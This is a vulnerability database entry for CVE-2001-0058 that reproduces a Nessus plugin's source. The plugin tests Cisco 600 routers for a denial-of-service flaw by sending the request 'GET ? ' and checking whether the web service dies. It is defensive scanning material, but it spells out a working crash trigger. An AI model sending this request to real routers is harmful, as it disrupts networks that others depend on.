Vulnerabilities > CVE-2001-0058 - Unspecified vulnerability in Cisco Broadband Operating System and Cisco 6XX Routers

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
cisco
nessus

Summary

The Web interface to Cisco 600 routers running CBOS 2.4.1 and earlier allow remote attackers to cause a denial of service via a URL that does not end in a space character.

Nessus

NASL familyCISCO
NASL idCISCO_675_HTTP_DOS.NASL
descriptionIt was possible to lock the remote router by sending the following request : GET ? An attacker may use this flaw to lock this host, thus preventing your network from working properly.
last seen2020-06-01
modified2020-06-02
plugin id10561
published2000-11-29
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10561
titleCisco 600 Series Router HTTP GET DoS (cisco-sa-20001204-cbos)
code
#
# (C) Tenable network Security, Inc.
#
# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: this domain no longer exists)
#      Added link to the Bugtraq message archive
#      Could support CVE-2001-0058
#

include("compat.inc");

if(description)
{
 script_id(10561);
 script_version ("1.32");
 script_cvs_date("Date: 2018/11/15 20:50:20");

 script_cve_id("CVE-2001-0058");
 script_xref(name:"CISCO-SA", value:"cisco-sa-20001204-cbos");

 script_name(english:"Cisco 600 Series Router HTTP GET DoS (cisco-sa-20001204-cbos)");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote router is prone to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"It was possible to lock the remote router by sending the following
request :

  GET ?

An attacker may use this flaw to lock this host, thus preventing your
network from working properly." );
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20001204-cbos
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?5df5b1a5" );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Nov/392" );
 script_set_attribute(attribute:"solution", value:
"Contact CISCO for a fix or add the following rule to your router :

  set web disabled
  write
  reboot" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:C");
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/11/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/11/28");
 script_set_attribute(attribute:"patch_publication_date", value: "2000/12/04");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/o:cisco:broadband_operating_system");
script_end_attributes();

 
 summary["english"] = "Crashes a Cisco router";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 family["english"] = "CISCO";
 script_family(english:family["english"]);
 script_require_ports("Services/www", 80);
 script_dependencies("find_service1.nasl", "os_fingerprint.nasl");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

os = get_kb_item("Host/OS");
if ( os && "CISCO" >!< os ) exit(0);


port = get_http_port(default:80);
banner = get_http_banner(port:port);
if ( "cisco-IOS" >!< banner ) exit(0);

if (http_is_dead(port:port)) exit(0);

r = http_send_recv_buf(port: port, data: 'GET ? \r\n\r\n');
sleep(1);
if (http_is_dead(port: port)) security_warning(port);